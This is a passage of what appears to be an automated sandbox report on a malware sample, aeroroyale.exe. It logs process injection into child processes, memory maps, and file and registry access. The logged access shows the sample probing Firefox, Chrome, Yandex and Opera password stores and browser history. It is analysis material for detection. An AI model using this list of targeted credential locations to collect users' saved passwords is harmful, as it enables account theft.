| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | address = 0x7ffdc008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd34 | os_tid = 0xd4c, address = 0x0 |
|
1 |
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | ED475410-B0D6-11D2-8C3B-00104B2A6676 | 9240A6CD-AF41-11D2-8C3B-00104B2A6676 | cls_context = CLSCTX_INPROC_SERVER |
|
1 |
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | desired_access = FILE_APPEND_DATA |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | size = 54 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = DLLPathEx, data = 67 |
|
1 |
Module (37)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL | base_address = 0x63480000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77760000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x777b418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x777b1f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x777b1e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x777b76e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x777b3879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x777624d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x77792111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x777a2510 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7779b009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x778689be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7785c02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7785c0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x77793f78 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77868bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7785b567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77885998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77852251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x778528f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x77792004 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x777e9aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x777ef3cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x777bebc6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x777ff29f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x777953a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x777ff21a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x777ef70b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x777ef71b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x777ef72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7779eb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-08-01 10:20:18 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 262190 |
|
1 | |
| Get Time | type = Ticks, time = 262206 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #11: aeroroyale.exe
277
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:36, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd50 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D54
0x
D64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x002b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x00387fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x003b0000 | 0x003ebfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| tzres.dll | 0x003b0000 | 0x003b0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0045afff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0116ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x0126ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01270000 | 0x0153efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x01740fff | Private Memory | rw |
|
|
|
- |
| nss3.dll | 0x01640000 | 0x017f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001640000 | 0x01640000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x01647fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001700000 | 0x01700000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001740000 | 0x01740000 | 0x0183ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001840000 | 0x01840000 | 0x0193ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001900000 | 0x01900000 | 0x019fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001a00000 | 0x01a00000 | 0x01df2fff | Pagefile Backed Memory | r |
|
|
|
- |
| nss3.dll | 0x63120000 | 0x632d4fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x665c0000 | 0x6667dfff | Memory Mapped File | rwx |
|
|
|
- |
| freebl3.dll | 0x666c0000 | 0x6670efff | Memory Mapped File | rwx |
|
|
|
- |
| freebl3.dll | 0x66710000 | 0x6675efff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x66930000 | 0x66956fff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x66940000 | 0x66956fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x669c0000 | 0x66a28fff | Memory Mapped File | rwx |
|
|
|
- |
| mozglue.dll | 0x66a30000 | 0x66a51fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x66a60000 | 0x66a66fff | Memory Mapped File | rwx |
|
|
|
- |
| softokn3.dll | 0x66a70000 | 0x66a96fff | Memory Mapped File | rwx |
|
|
|
- |
| nssdbm3.dll | 0x66a80000 | 0x66a96fff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x66ae0000 | 0x66aebfff | Memory Mapped File | rwx |
|
|
|
- |
| pstorec.dll | 0x66b10000 | 0x66b1cfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x66b50000 | 0x66bd3fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6f370000 | 0x6f3a1fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x76f60000 | 0x76f65fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x772e0000 | 0x7735afff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x77a30000 | 0x77a64fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | address = 0x7ffda008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd38 | os_tid = 0xd54, address = 0x0 |
|
1 |
Host Behavior
File (122)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | type = time |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\nss3.dll | type = file_attributes |
|
3 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\sqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\mozsqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Sea Monkey\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = file_attributes |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data | type = file_attributes |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 8, size_out = 8 |
|
23 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 256, size_out = 256 |
|
22 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 384, size_out = 384 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat | size = 8, size_out = 8 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat | size = 256, size_out = 256 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 8, size_out = 8 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 256, size_out = 256 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 8, size_out = 8 |
|
4 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 256, size_out = 256 |
|
4 |
Registry (15)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | Mozilla Firefox\bin | - |
|
3 | |
| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
